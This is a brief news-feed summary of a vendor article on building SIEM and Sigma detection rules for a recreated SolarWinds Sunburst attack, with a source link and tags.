Detecting the "Next" SolarWinds-Style Cyber Attack

2021-04-13 10:21

Developing SIEM rules, using the SolarWinds attack as an example.

In the case of the SolarWinds Sunburst attack and many other attacks, Cymulate Sigma Rules are queries that search for the IOBs of the attack.

Let's look at the specific case of a recreated SolarWinds attack on the Windows platform and hunt it together.

The next event in the attack is downloading content with PowerShell.

If you have built this SIEM or EDR rule, using Cymulate-provided Sigma rules, and you see an alert from it - there is a good chance you are experiencing the SolarWinds attack right now.

The steps as shown in this article are meant to help with the optimization and guide through how to prevent a SolarWinds type attack.

News URL

http://feedproxy.google.com/~r/TheHackersNews/~3/E54HufS4xFI/detecting-next-solarwinds-attack.html

#attack #solarwinds

News URL

Related news